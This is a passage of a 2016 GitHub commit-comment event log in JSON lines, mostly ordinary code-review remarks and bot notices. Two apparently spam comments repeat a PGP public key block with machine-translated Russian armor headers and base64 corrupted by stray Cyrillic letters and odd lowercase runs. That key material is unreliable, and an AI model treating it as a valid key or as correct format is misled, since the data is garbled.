miT\r\noqk+izEChGm2knzrLwhoflR8aGsKL35QoZT/erdjfgPeCRLvf25fHsN2Jb0WIMzC\r\n56VkMeFoza+9HZ5hrkemmm+gPvIvhEUopxCyOS8mK5WjB4zzIdyDJfkqvphvafnp\r\n0N4LIsedKdyHcj/K3kY4Kejl99GW1z1snBgPamoN2/e52Pf6KTw2FjsSGZ72oalc\r\nrkBR4wacUizGxKcRD2Y6Xa0g9mwToWdNbqciii+uTzOzq1EDABEBAAG0IVdlcm5l\r\nciBLb2NoIChSZWxlYXNlIFNpZ25pbmcgs2v5kykbpqqtaqgajwucveopugibawuj\r\nC6oF9QULCQgHAgYVCAkKCwIEFgIDAQIeaqixgaakcrckhhscfv1g2ah7b/wIW6mV\r\nmTmzW2xc1q1MUdssExQBhEeONrbWJ/HiGZP/MaabgQ/+wZuThTAwfGM5zFQBOvrB\r\nOGURhINU6lYQlcOrVo+V8Z1mNQKFWaKxJaY5Ku1bB1OuX9FHLEimiboghu5fjjix\r\nBE8XrnvueejyFQ5g/uX2xcGgCWlMe49sR3K+lEl3n93xTmSNhP52r0gTjMjbqKWK\r\nUaIGJ5OcWSrvawdfqLXkxR8phq2AlHHEfxpczsop9mzirwyq5jcgggfp0lyxuw/Р\r\nnxFpOcrj45qufmyEL9QJKjBV5RaHJbqukefwuinpqtvuminqqxztsh5qxqp2tsup\r\nIeEi5RAoCwLJam8ziQEcBBABCAAGBQJUu4juaaojecsbodjpjeo2c+ч+wevKc8w\r\nbkWSoGOJiYDglVMJa4x5utgHyXP4Pyqeliq7yibfqq3yyou9rwrgxfvuofpxpx1e\r\nу/XtCGgw03r4HZhauauYe27IDpA5P/Go7+WqufT6gMBoZf/1cD2ykQZpFyszEKHf\r\nГ+BlzqPJcRaXy4+uQG3O+ЧД/R2eIGAJDao/AclJI+kfckeY5DzRTibPex+rGAkxZ\r\n8qHtlCb0WeUbL3mgl9f3LlbPH77w1on6xqqiaq+ОРВ/3CUOIhNI3lrGO7mIqhSC\r\n0н+rpqLHeVLpLkz0IFvsJOp9UOHDCA8oL0cqtjgp1pn7mukr9ncvtonun41japoo\r\n4ZaHe5Y0r5MIofSYjgRDt/rHAQQA0JkZeitcyQMqk2xGd/5mGoc4+YNwQo8OSmVw\r\nIvY8UAI3tBorhF6ha9niaqZU4vdldTnXmu0j1opckahogrpaovaezhyutf0f/15р\r\niAF5dkZQ6dsmXVUkPNYMZTpkc2nA+IACBiOmygGBkLFuXvHRW1i6SNz28iRH/UZc\r\nЫли/2iEAIIFWUJm0Jldlcm5lciBLb2NoIChkaxn0ihnpzykgpgrkowpuqgduds5v\r\nкмц+iLwEEwECACYCGwMGCwkIBwMCBBUCCAMEfgidaqieaqixgaucts2mtwujclro\r\nYQAKCRBTtiDQHODGMPB4A/0U1DJR9LbkWuBs8Ko6KJoKLMVI6iYNJBhatm3dxweu\r\nxA16eYDWW/b9Lk5KnjtSWuGOeqa7MCsXnkyHkO88KE9icm3mfnhffn2qagd/нрч\r\nl9MPsdOgf/ug7j72Alv2V8s28R10HTjfwySe/omXWwK3qn8ou6N7ID+EwCV7i2e2\r\nu5kBogQ1oh4eEQQA/pdK4Oafa1uDN7Cr5nss4bNpg8YUSg01Vvj08ktcedpcapau\r\n+NzaP3KD2ow74WU2gzP70s9uSGQ2Vie4Blvokaabhba/3ivBrg3ILFrxbOfmKQg8\r\nFhtncd/TBOwzfkkbxBNcVJuBPRtjZ3dlDbS4IPNsiiv2sucifqma8qngvwsaoirj\r\n90b2fzERCZkKtfkoyYA8fnNrBADhJ8Rmirkicndk3tzk04nu6o8fp3ptrmno7jlu\r\nvDfsEVsYRjyMbDnbnjCGu1PeFoP2HZ+H9lp4CaQbyjWh2JlvI9UOc72V16SFkV0r\r\n8k0euNQXHhhzXWIkfz4gwSbBkN2nO5+6cIVeKnsdyFYkQyVs+флопе q86/PMfjo7utyrc\r\nWLq1CAQAou3da1JR6+KJO4gUZVh2F1NoaVCEPAvlDhNV10/hwe5mS0kTjUJ1jMl5\r\n6mwAFvhFFF9saW+eAnrwIOHjopbdHrPBmTJlOnNMHVLJzFlqjihwrrzqyl8inu2m\r\nfarn9Mr28ut5BQmp0CnNEJ6hl0Cs7l2xagwftlek2ii144vk3fg0j1dlcm5lcibl\r\nb2NoIChnbnVwZyBzaWcpIDxkZDlqbkBnbnuub3jnpohhbbmragahaheabqkofif9\r\nBQJBvGheBgsJCAcDAgMVAgMDFgIBAh4Baaojegi3q4lxvi3nbjman01313ag0tgj\r\nrGUZtDlKYbmNIeMeAJ0UpVsjxpylBcSjspe8maki7hb2rw==\r\n=W3eM\r\n-----КОНЕЦ ОТКРЫТЫМ КЛЮЧОМ PGP БЛОК\r\n\r\n``\r\n\r\n\r\n"}},"created_at":"2016-09-08T03:04:06Z"}
{"id":"4531540874","type":"CommitCommentEvent","actor":{"login":"carlvieriste"},"repo":{"name":"carlvieriste/imn601-tp"},"payload":{"comment":{"id":18939053,"position":62,"line":346,"path":"code/MImage.cpp","commit_id":"8120405ecd62dc68395eaf876230f258893cf211","created_at":"2016-09-08T03:04:30Z","updated_at":"2016-09-08T03:04:30Z","body":"Il faut vérifier que la valeur du pixel est dans un rayon acceptable autour de la valeur du pixel de référence.\r\nIl faut vérifier que `abs(image(i,j) - pixelReference) < tolerance` et non que `image(i,j) < pixelReference`."}},"created_at":"2016-09-08T03:04:30Z"}
{"id":"4531542321","type":"CommitCommentEvent","actor":{"login":"romeo27091985"},"repo":{"name":"anselmolsm/soletta-machine-learning"},"payload":{"comment":{"id":18939055,"position":4,"line":40,"path":"soletta_module/sml_garden/sml_garden.json","commit_id":"138618b1cf93bcec2f65ca72de9e0aad1aa26be7","created_at":"2016-09-08T03:05:04Z","updated_at":"2016-09-08T03:05:04Z","body":"[](url)"}},"created_at":"2016-09-08T03:05:04Z"}
{"id":"4531542391","type":"CommitCommentEvent","actor":{"login":"ApacheThunder"},"repo":{"name":"DanTheMan827/NTR_Forwarder"},"payload":{"comment":{"id":18939056,"position":null,"line":null,"path":null,"commit_id":"5fa54d988257c5dd927961dbb8ab172204d189fe","created_at":"2016-09-08T03:05:06Z","updated_at":"2016-09-08T03:05:06Z","body":"Hmm which card is it? The only thing that might cause an issue is the fact I don't have the nand bit enabled in the 0x1b8 section of DSi Extended header (modified python script to not set this) because doing so triggers DSi mode touchscrene which breaks touchscreen for NTR games.\r\n\r\nBut assuming you manually specify the SCFG_EXT values on arm7 and arm9 in my latest commits of NTR Launcher, SD access should work.\r\n\r\nAs for SD on slot-1 card. That depends. I've never gotten DLDI to init correctly on a SDHC based flashcart. (like DSTT or Gateway Blue Cart). For whatever reason you have to boot from the cards to use DLDI on them.\r\n\r\nI thought you resolved this?"}},"created_at":"2016-09-08T03:05:06Z"}
{"id":"4531544852","type":"CommitCommentEvent","actor":{"login":"romeo27091985"},"repo":{"name":"anselmolsm/soletta-machine-learning"},"payload":{"comment":{"id":18939063,"position":2,"line":46,"path":"soletta_module/sml_garden/sml_garden.c","commit_id":"138618b1cf93bcec2f65ca72de9e0aad1aa26be7","created_at":"2016-09-08T03:05:59Z","updated_at":"2016-09-08T03:05:59Z","body":"НАЧАТЬ С ОТКРЫТЫМ КЛЮЧОМ PGP БЛОК-----\r\nВерсия: v2 с помощью gnupg\r\n\r\nmQENBE0ti4EBCACqGtKlX9jI/enhlBdy2cyQP6Q7JoyxtaG6/ckAKWHYrqFTQk3I\r\nUe8TuDrGT742XFncG9PoMBfJDUNltIPgkfn8e9tyqqaolpsa25bob30ca2adkrjg\r\njvDAH8cZ+fkIayWtObTxwqLfPivjFxEM//IdShFFVQj+QHmXYBJggWyEIil8Bje7\r\nKRw6B5ucs4qSzp5VH4CqDr9PDnLD8lBGhk0x8jpwh4v/yEODJKATY0Vj00793L8u\r\nqA35ZiyczUvvJSLYvf7STO943GswkxdAfqxxbyifik2gje/7SAmB+2jFxsonUDOB\r\n1BAY5s3FKqrkaxZr3BBjeuGGoCuiSX/cXRIhABEBAAG0Fldlcm5lciBLb2NoIChk\r\naXN0IHNpZymJAT4EEwECACgFAk0ti4ECgwmfcrddnwigcwkibwmcbhuiagkkcwqw\r\nAgMBAh4BAheAAAoJECSbOdJPJeO2PlMIajxptfxf5yozppfjrbsksdjsk9eru05s\r\nhKZOAKw3RUePTU80SRLPdg4AH+vkm1JMWFFpwvHlgfxqnE9rp13o7L/4UwNUwqH8\r\n5zCwu7SHz9cX3d4UUwzcP6qQP4BQEH9/xlpQS9eTK9b2RMyggqwd/J8mxjvoWzL8\r\nКлф/wl6jXHn/yP92xG9/YA86lNOL1N3/PhlZzLuJ6bdD9WzsEp/+kh3UDfjkIrOc\r\nWkqwupB+d01R4bHPu9tvXy8Xut8Sok2zku2xVkEOsv2txhbwuho2agc5pwdx6wgc\r\nE4F5XeCB/0ovao2/bk22w1TxzP6PMxo6sLkmaF6D0frhM2bl4c/uSsqInAQQAQIA\r\nBgUCTS2NBAAKCRBTtiDQHODGMEZPBACLmrmjpwmyvvi6x5n4nlwctxqwy+4ODx2i\r\nO9CtUM/F96YiPFlmgwsJUzyXLwALYk+shh83TjQLfjexohzS1O07DCZUy7Lsb9R7\r\nHbYJ1Yf/QcEykbiAW465CZb1BAOMR2HUODBTaABaidfnhmuzjtayz7y0kkrhax+В\r\nVS6kfnsFq5kBDQRUUF8HAQgAh1mo8r+kVWVTNsNlyurm2tdZKiQbdeVgpBgcDnqi\r\n3fAV58C3nC8DVuK5qVGZPB/jbu42jc8BXGP1l6UP+515LQL5GpTtV0pRWUO02WOu\r\nTLZBVQcq53vzbg1xVo31rWV96mqGAPs8lgucm09fpuivkqojo6/Ihkg7/bnzeSbc\r\nX5Xk9eKLhyB7tnakuYJeRYm4bjs+YDApK8IFQyevYF8pjTcbLTSNJPW9WLCsozsy\r\n11r4xdfRcTWjARVz5VzTnQ+Px8YtsnjQ3qwNJBpsqMLCdDN7YGhh/mlwPjgdq/УФ\r\nф5+bY6f3ew0vshBqInBQycBSmYyoX0Ye3sAs/OR4nu5ZaQARAQABtD5EYXZpZCBT\r\naGF3IChHbnVQRyBSZWxlYXNlIFNpZ25pbmcgs2v5ksa8zhnoyxdaamfiymvyd29j\r\na3kuY29tPokBPgQTAQIAKAUCVFBfBwIbawujcbp27gylcqghawigfqgccqolbbyc\r\nAwECHgECF4AACgkQBDdvPuCFaVmIoQf+POxCWkCTicRVlq0kust/iwYO1egK9FWG\r\n130e2Irnv2lAZZN/0S5ibjHCYFp9gfMgmtVTF5oWXjSDAy/kIykQBBcUVx4SCJbd\r\nMtKSdsSIQMz6P4DxXumxQm79msOsbi5Tsdtuwjqdrbu2shloe7ck/hTXUCkX3zuq\r\ntxY7W23BCQxVVT5qUaFuAHkkQaaBgAb8gdgixmkibfu9u8k3k9zukm/PNfMjxClv\r\nORkP8gev+XyzNgcXM49h5YYlmDT+Ahv99nUM1wg8yJTjefBAY0fL982Scx30ndqo\r\n3w7ihALUoj5+TXQjhs3sWPJ8u3pstr9XcfzEZC77/CZmRYNr8g5hBokBHAQQAQgA\r\nBgUCVFOBbwAKCRAkmznSTyXjtmHeB/0X00v959Oyc0EsSLOlfC52qsEn5cU7vxfb\r\n+KY9aKtG4+hApJxemkqpCgA5+xZwXp3SQOf0sYFwz5OsukIjRF0HgSEdjomth6b7\r\nlT0nCwKo8AMU0nJbopVIJikHOzk2gUqh1gxu5iml1rbskmfhigjyeqm+ONQynCeX\r\nGg3LLZCQ1eeoaX69bvbWQFDtTIn2HYvjzljugc6pgh/naZ7GchiiiK0bs4UOdJFX\r\nHtITC/7DcgEiHMHOMT3XlwINTexZG0grl2LuWuyyhurjh5io6gearpkumr8sjjjv\r\nazpwbutZhYjTzfUpPvKK8kCSan9Df5eeekdrkcu8x8aqldvyoqcrmqenbfrqoymb\r\nCADmEHA30Xc6op/72ZcJdQMriVvnAyN22L3rEbTiACfvBajs6fpzme2ujlc5f1hk\r\nYdx3DvdcLoIV6Ed6j95JViJaoE0EB8T1tnuqrl5xj7japopvpyqerf3vreydcdir\r\numlEb8zCQvVTICsIYYAo3oxX/З/M7ogZDDeOe1G57f/Y8YacZqKw0AqW+20dZn3W\r\n7Lgpjl8EzX25AKBl3Hi/з+с/T7JCqxZPAlQq/KbHkYh81oIm+AX6/5о+vCynEEx/\r\n2OkdeoNeeHgujwL8axAwPoYKVV9COy+/NQcofZ6gvig1+S75RrkG4AdiL64C7OpX\r\n1N2kX08KlAzI9+65lyUw8t0zABEBAAG0Mk5JSUJFIFl1dGfrysaor251uecgumvs\r\nZWFzZSBLZXkpIDxnbmlpYmVAZnNpai5vcmc+iQE8BBMBCAAmBQJUUDsjAhsDBQkD\r\nwmcABQsHCAkDBBUICQoFFgIDAQACHgECf4aacgkqihgwijo9pwz1/wgA0LKal1wF\r\nZa8FPUonc2GzwE9YhkZiJB8KA/a7T6//cW4N46/GswiqZJxN1RdKs1B+rp7EMMU3\r\nbhoXstLBcIYveljqh4lPBWCsTT2+/OpwAmgnzjgdTHcpnCMTEOdZktD5SKrTj2tv\r\naWXAlWK/UsEEanA3cvzofy44n7rm+Eoa7P1YGCHL++Ihsi66ElbehilTT/xxckHX\r\nUji1XDvoagEENEHk5j4Z2mhWtjnGclvuibks4xezeznmw/fPAypZX4bkURNbGd8j\r\ntkb3Eqt+БВ+ZQoSA+Ukv8APaAzj8lRSw+CYjDxpoM0jtmiPrk+ед/Do46COVA/IX2\r\n2aYNT2Y2KoWJV4kBHAQQAQgABgUCVFOChqakcrakmznstyxjtoihb/0ZE/ppI2Gc\r\nqDxSwPKkRkkoMD8oXdKkPxjUF2jgP+bceHKiz1F78cx/eZltB4av8OujO1IwqH2C\r\n0aVr46W3eSyIcpmmw6F9sjLcTfyZJfWJrvobb7wqskvww0ehfgngr6z+BA3ohjws\r\naCZtzzkH2gXI+EM7qaZozMw+eSkZ4qTE9B4/hkMZZpBO0oGy9PQzSlADGftyyuTt\r\noSUvepfs+EvYSddQ7skXWq0zePuOhng2Mppl690A+aTywyetbPvVeqjiAbI7NB5f\r\n8Tw7dk0Febe9NHvbwzgiStMPmIKrTcthvgiclbkzvmkbfwapxypdhflzalpdgxjt\r\nR31c0zNFBH68mQENBFRDqVIBCAC0k8eZkdmnqdmawolj/m62L2g8uXT/+/vAEGb1\r\nyaib09xI6tfGXzbqlDwrLIZcJsSIT/НТ/ajJnIVbc3137va4XbwMzsDpAMH4mmiT\r\noqk+izEChGm2knzrLwhoflR8aGsKL35QoZT/erdjfgPeCRLvf25fHsN2Jb0WIMzC\r\n56VkMeFoza+9HZ5hrkemmm+gPvIvhEUopxCyOS8mK5WjB4zzIdyDJfkqvphvafnp\r\n0N4LIsedKdyHcj/K3kY4Kejl99GW1z1snBgPamoN2/e52Pf6KTw2FjsSGZ72oalc\r\nrkBR4wacUizGxKcRD2Y6Xa0g9mwToWdNbqciii+uTzOzq1EDABEBAAG0IVdlcm5l\r\nciBLb2NoIChSZWxlYXNlIFNpZ25pbmcgs2v5kykbpqqtaqgajwucveopugibawuj\r\nC6oF9QULCQgHAgYVCAkKCwIEFgIDAQIeaqixgaakcrckhhscfv1g2ah7b/wIW6mV\r\nmTmzW2xc1q1MUdssExQBhEeONrbWJ/HiGZP/MaabgQ/+wZuThTAwfGM5zFQBOvrB\r\nOGURhINU6lYQlcOrVo+V8Z1mNQKFWaKxJaY5Ku1bB1OuX9FHLEimiboghu5fjjix\r\nBE8XrnvueejyFQ5g/uX2xcGgCWlMe49sR3K+lEl3n93xTmSNhP52r0gTjMjbqKWK\r\nUaIGJ5OcWSrvawdfqLXkxR8phq2AlHHEfxpczsop9mzirwyq5jcgggfp0lyxuw/Р\r\nnxFpOcrj45qufmyEL9QJKjBV5RaHJbqukefwuinpqtvuminqqxztsh5qxqp2tsup\r\nIeEi5RAoCwLJam8ziQEcBBABCAAGBQJUu4juaaojecsbodjpjeo2c+ч+wevKc8w\r\nbkWSoGOJiYDglVMJa4x5utgHyXP4Pyqeliq7yibfqq3yyou9rwrgxfvuofpxpx1e\r\nу/XtCGgw03r4HZhauauYe27IDpA5P/Go7+WqufT6gMBoZf/1cD2ykQZpFyszEKHf\r\nГ+BlzqPJcRaXy4+uQG3O+ЧД/R2eIGAJDao/AclJI+kfckeY5DzRTibPex+rGAkxZ\r\n8qHtlCb0WeUbL3mgl9f3LlbPH77w1on6xqqiaq+ОРВ/3CUOIhNI3lrGO7mIqhSC\r\n0н+rpqLHeVLpLkz0IFvsJOp9UOHDCA8oL0cqtjgp1pn7mukr9ncvtonun41japoo\r\n4ZaHe5Y0r5MIofSYjgRDt/rHAQQA0JkZeitcyQMqk2xGd/5mGoc4+YNwQo8OSmVw\r\nIvY8UAI3tBorhF6ha9niaqZU4vdldTnXmu0j1opckahogrpaovaezhyutf0f/15р\r\niAF5dkZQ6dsmXVUkPNYMZTpkc2nA+IACBiOmygGBkLFuXvHRW1i6SNz28iRH/UZc\r\nЫли/2iEAIIFWUJm0Jldlcm5lciBLb2NoIChkaxn0ihnpzykgpgrkowpuqgduds5v\r\nкмц+iLwEEwECACYCGwMGCwkIBwMCBBUCCAMEfgidaqieaqixgaucts2mtwujclro\r\nYQAKCRBTtiDQHODGMPB4A/0U1DJR9LbkWuBs8Ko6KJoKLMVI6iYNJBhatm3dxweu\r\nxA16eYDWW/b9Lk5KnjtSWuGOeqa7MCsXnkyHkO88KE9icm3mfnhffn2qagd/нрч\r\nl9MPsdOgf/ug7j72Alv2V8s28R10HTjfwySe/omXWwK3qn8ou6N7ID+EwCV7i2e2\r\nu5kBogQ1oh4eEQQA/pdK4Oafa1uDN7Cr5nss4bNpg8YUSg01Vvj08ktcedpcapau\r\n+NzaP3KD2ow74WU2gzP70s9uSGQ2Vie4Blvokaabhba/3ivBrg3ILFrxbOfmKQg8\r\nFhtncd/TBOwzfkkbxBNcVJuBPRtjZ3dlDbS4IPNsiiv2sucifqma8qngvwsaoirj\r\n90b2fzERCZkKtfkoyYA8fnNrBADhJ8Rmirkicndk3tzk04nu6o8fp3ptrmno7jlu\r\nvDfsEVsYRjyMbDnbnjCGu1PeFoP2HZ+H9lp4CaQbyjWh2JlvI9UOc72V16SFkV0r\r\n8k0euNQXHhhzXWIkfz4gwSbBkN2nO5+6cIVeKnsdyFYkQyVs+флопе q86/PMfjo7utyrc\r\nWLq1CAQAou3da1JR6+KJO4gUZVh2F1NoaVCEPAvlDhNV10/hwe5mS0kTjUJ1jMl5\r\n6mwAFvhFFF9saW+eAnrwIOHjopbdHrPBmTJlOnNMHVLJzFlqjihwrrzqyl8inu2m\r\nfarn9Mr28ut5BQmp0CnNEJ6hl0Cs7l2xagwftlek2ii144vk3fg0j1dlcm5lcibl\r\nb2NoIChnbnVwZyBzaWcpIDxkZDlqbkBnbnuub3jnpohhbbmragahaheabqkofif9\r\nBQJBvGheBgsJCAcDAgMVAgMDFgIBAh4Baaojegi3q4lxvi3nbjman01313ag0tgj\r\nrGUZtDlKYbmNIeMeAJ0UpVsjxpylBcSjspe8maki7hb2rw==\r\n=W3eM\r\n-----КОНЕЦ ОТКРЫТЫМ КЛЮЧОМ PGP БЛОК"}},"created_at":"2016-09-08T03:05:59Z"}
{"id":"4531545589","type":"CommitCommentEvent","actor":{"login":"carlvieriste"},"repo":{"name":"carlvieriste/imn601-tp"},"payload":{"comment":{"id":18939065,"position":67,"line":351,"path":"code/MImage.cpp","commit_id":"8120405ecd62dc68395eaf876230f258893cf211","created_at":"2016-09-08T03:06:16Z","updated_at":"2016-09-08T03:06:16Z","body":"Il n'y a pas de `else` dans l'algo donné par le prof. Je ne pense pas que ça ne change pas le comportement du programme."}},"created_at":"2016-09-08T03:06:16Z"}
{"id":"4531546252","type":"CommitCommentEvent","actor":{"login":"romeo27091985"},"repo":{"name":"anselmolsm/soletta-machine-learning"},"payload":{"comment":{"id":18939067,"position":5,"line":41,"path":"soletta_module/sml_garden/sml_garden.json","commit_id":"138618b1cf93bcec2f65ca72de9e0aad1aa26be7","created_at":"2016-09-08T03:06:32Z","updated_at":"2016-09-08T03:06:32Z","body":">  #[](url)"}},"created_at":"2016-09-08T03:06:32Z"}
{"id":"4531550194","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18939073,"position":null,"line":null,"path":null,"commit_id":"39d26be21f1f398b638069bf97cdbfbf5222e296","created_at":"2016-09-08T03:08:05Z","updated_at":"2016-09-08T03:08:05Z","body":"os_2_0_develop (macumber) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-39d26be21f1f398b638069bf97cdbfbf5222e296-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a>  \n"}},"created_at":"2016-09-08T03:08:05Z"}
{"id":"4531553045","type":"CommitCommentEvent","actor":{"login":"carlvieriste"},"repo":{"name":"carlvieriste/imn601-tp"},"payload":{"comment":{"id":18939085,"position":50,"line":335,"path":"code/MImage.cpp","commit_id":"8120405ecd62dc68395eaf876230f258893cf211","created_at":"2016-09-08T03:09:15Z","updated_at":"2016-09-08T03:09:15Z","body":"Il manque du code ici après cette ligne. Il faut boucler sur tous les pixels et setter le pixel de l'image résultante à 1 si `y(i,j) > 0`. En ce moment l'image résultante reste identique à l'image d'entrée."}},"created_at":"2016-09-08T03:09:15Z"}
{"id":"4531553705","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":18939087,"position":null,"line":null,"path":null,"commit_id":"10612d570a2cef7da8942e13ea10177ef1652bd6","created_at":"2016-09-08T03:09:31Z","updated_at":"2016-09-08T03:09:31Z","body":"The following doc(s) have been deployed to the [albertruby](https://albertruby-static-docs.pantheonsite.io/docs) Multidev environment:\n- [docs/clone-site](https://albertruby-static-docs.pantheonsite.io/docs/clone-site)\n"}},"created_at":"2016-09-08T03:09:31Z"}
{"id":"4531554930","type":"CommitCommentEvent","actor":{"login":"Mtrshimao"},"repo":{"name":"Mtrshimao/2005"},"payload":{"comment":{"id":18939090,"position":null,"line":null,"path":null,"commit_id":"48e99da3bdd8ae5b63597ca6802e7ba4cba1861b","created_at":"2016-09-08T03:10:00Z","updated_at":"2016-09-08T03:10:00Z","body":"趋势图"}},"created_at":"2016-09-08T03:10:00Z"}
{"id":"4531555667","type":"CommitCommentEvent","actor":{"login":"carlvieriste"},"repo":{"name":"carlvieriste/imn601-tp"},"payload":{"comment":{"id":18939092,"position":null,"line":null,"path":null,"commit_id":"8120405ecd62dc68395eaf876230f258893cf211","created_at":"2016-09-08T03:10:17Z","updated_at":"2016-09-08T03:10:17Z","body":"C'est un bon début. Quelques modifications à faire et le tour est joué. Je pourrai le faire si tu veux."}},"created_at":"2016-09-08T03:10:17Z"}
{"id":"4531555895","type":"CommitCommentEvent","actor":{"login":"BIGBANGTAEYANG"},"repo":{"name":"BIGBANGTAEYANG/NewRepository"},"payload":{"comment":{"id":18939093,"position":null,"line":null,"path":null,"commit_id":"809dcc67590768d68939c4a7c4409ad8f21a2de9","created_at":"2016-09-08T03:10:21Z","updated_at":"2016-09-08T03:10:21Z","body":"项目框架spring Struts2 mybatis"}},"created_at":"2016-09-08T03:10:21Z"}
{"id":"4531556245","type":"CommitCommentEvent","actor":{"login":"DanTheMan827"},"repo":{"name":"DanTheMan827/NTR_Forwarder"},"payload":{"comment":{"id":18939094,"position":null,"line":null,"path":null,"commit_id":"5fa54d988257c5dd927961dbb8ab172204d189fe","created_at":"2016-09-08T03:10:29Z","updated_at":"2016-09-08T03:10:29Z","body":"I had working code before but this is after I merged your latest changes...\r\n\r\nI have a R4i 3DS RTS that worked just fine with my previous code as of commit 6d3861431bb877d8ba81072f5c3cb962ed725319\r\n\r\nBut after merging fatInitDefault isn't giving me anything for fat1:/\r\n\r\nI'm guessing the card isn't powered on before fatInitDefault?"}},"created_at":"2016-09-08T03:10:29Z"}
{"id":"4531557364","type":"CommitCommentEvent","actor":{"login":"RigoBono"},"repo":{"name":"RigoBono/claseBombone"},"payload":{"comment":{"id":18939097,"position":null,"line":null,"path":null,"commit_id":"d31a3be7ab2c193469e867e9d7f6a49e7d812521","created_at":"2016-09-08T03:10:53Z","updated_at":"2016-09-08T03:10:53Z","body":"Puede tronar"}},"created_at":"2016-09-08T03:10:53Z"}
{"id":"4531557577","type":"CommitCommentEvent","actor":{"login":"kgliu0101"},"repo":{"name":"ClinGen/clincoded"},"payload":{"comment":{"id":18939098,"position":4,"line":6,"path":"src/clincoded/static/components/variant_central/interpretation/shared/calculator.js","commit_id":"97edbaa9eb71cb3cd41733d35975b59a29e770ee","created_at":"2016-09-08T03:10:58Z","updated_at":"2016-09-08T03:10:58Z","body":"A couple of discussion about `let` and `var` in es6\r\n[http://programmers.stackexchange.com/questions/274342/is-there-any-reason-to-use-the-var-keyword-in-es6](http://programmers.stackexchange.com/questions/274342/is-there-any-reason-to-use-the-var-keyword-in-es6)\r\n[https://medium.com/javascript-scene/javascript-es6-var-let-or-const-ba58b8dcde75#.qh8m291oj](https://medium.com/javascript-scene/javascript-es6-var-let-or-const-ba58b8dcde75#.qh8m291oj)"}},"created_at":"2016-09-08T03:10:58Z"}
{"id":"4531560384","type":"CommitCommentEvent","actor":{"login":"88BenXiaoYang"},"repo":{"name":"88BenXiaoYang/MyProject"},"payload":{"comment":{"id":18939106,"position":null,"line":null,"path":null,"commit_id":"ff0316f3ea1b92ba831b0bd6d67f656264dac489","created_at":"2016-09-08T03:12:08Z","updated_at":"2016-09-08T03:12:08Z","body":"test"}},"created_at":"2016-09-08T03:12:08Z"}
{"id":"4531560892","type":"CommitCommentEvent","actor":{"login":"h-wang"},"repo":{"name":"userbase-project/userbase-client-php"},"payload":{"comment":{"id":18939108,"position":7,"line":160,"path":"src/Model/User.php","commit_id":"2f12ee6c0a36e3430940ce940a9e220ff49a0179","created_at":"2016-09-08T03:12:17Z","updated_at":"2016-09-08T03:12:17Z","body":"@joostfaassen return $this;"}},"created_at":"2016-09-08T03:12:17Z"}
{"id":"4531561074","type":"CommitCommentEvent","actor":{"login":"842895893"},"repo":{"name":"842895893/ICS4UR"},"payload":{"comment":{"id":18939109,"position":null,"line":null,"path":null,"commit_id":"9e300f6fad43d9f0204f7afccddaa43a01f696fc","created_at":"2016-09-08T03:12:22Z","updated_at":"2016-09-08T03:12:22Z","body":"![javahelloworld](https://cloud.githubusercontent.com/assets/15019668/18335851/84e40de0-7550-11e6-8b52-8475ad08c093.PNG)\r\n"}},"created_at":"2016-09-08T03:12:22Z"}
{"id":"4531563612","type":"CommitCommentEvent","actor":{"login":"fititnt"},"repo":{"name":"webiwg/historia-web-pt"},"payload":{"comment":{"id":18939111,"position":null,"line":null,"path":null,"commit_id":"9a8f5ac231ebfacea5419a3e07dbd062f210d08e","created_at":"2016-09-08T03:13:21Z","updated_at":"2016-09-08T03:13:21Z","body":"Errei referencia. A referencia correta é #5 "}},"created_at":"2016-09-08T03:13:21Z"}
{"id":"4531565550","type":"CommitCommentEvent","actor":{"login":"ApacheThunder"},"repo":{"name":"DanTheMan827/NTR_Forwarder"},"payload":{"comment":{"id":18939115,"position":null,"line":null,"path":null,"commit_id":"5fa54d988257c5dd927961dbb8ab172204d189fe","created_at":"2016-09-08T03:14:06Z","updated_at":"2016-09-08T03:14:06Z","body":"Oh wow that commit is really old compared to what it is now. It even has the original card reset code as it was when ahezard first wrote it. My only suggestion is to incrementally test further commits until you find the one that breaks it.\r\n\r\nMy best guess is maybe card reset code is responsible. Disable it and see if DLDI works. It won't boot the card like this, but you can see if your stuff is able to write to the card's storage.\r\n\r\nCard Reset has broken DLDI init in my experience and I'm surprised DLDI init ever worked at all for you with the card reset code being used."}},"created_at":"2016-09-08T03:14:06Z"}
{"id":"4531565884","type":"CommitCommentEvent","actor":{"login":"BrianLusina"},"repo":{"name":"Harrisonkamau/python-peers"},"payload":{"comment":{"id":18939116,"position":10,"line":34,"path":"allergies/allergies.py","commit_id":"e0b1b4348269ef5d20113dffa0c5ab971eb4e72b","created_at":"2016-09-08T03:14:13Z","updated_at":"2016-09-08T03:14:13Z","body":"This is where you can initialize the `lst ` variable so it is called as a variable and not as a method."}},"created_at":"2016-09-08T03:14:13Z"}
{"id":"4531565914","type":"CommitCommentEvent","actor":{"login":"quynhn"},"repo":{"name":"linagora/james-project"},"payload":{"comment":{"id":18939117,"position":13,"line":208,"path":"mailbox/store/src/main/java/org/apache/james/mailbox/store/StoreMailboxManager.java","commit_id":"99e2d57fdc575a03e65760fc29751b3829511092","created_at":"2016-09-08T03:14:14Z","updated_at":"2016-09-08T03:14:14Z","body":"null mean do not care about session\r\n"}},"created_at":"2016-09-08T03:14:14Z"}
{"id":"4531565919","type":"CommitCommentEvent","actor":{"login":"frankstepanski"},"repo":{"name":"frankstepanski/Spoon-Knife"},"payload":{"comment":{"id":18939118,"position":null,"line":null,"path":null,"commit_id":"ec1048123c6b6eebf9942bd08c5587700779c714","created_at":"2016-09-08T03:14:14Z","updated_at":"2016-09-08T03:14:14Z","body":"Updated index"}},"created_at":"2016-09-08T03:14:14Z"}
{"id":"4531567357","type":"CommitCommentEvent","actor":{"login":"KevinGrahamFoster"},"repo":{"name":"davedash/django-fixture-magic"},"payload":{"comment":{"id":18939119,"position":null,"line":null,"path":null,"commit_id":"414edd244fae0caa1f46d1e1eabfbb55361c78d0","created_at":"2016-09-08T03:14:44Z","updated_at":"2016-09-08T03:14:44Z","body":"Hey Dave, I don't suppose I could get you to release this? Hope all's well. :)"}},"created_at":"2016-09-08T03:14:44Z"}
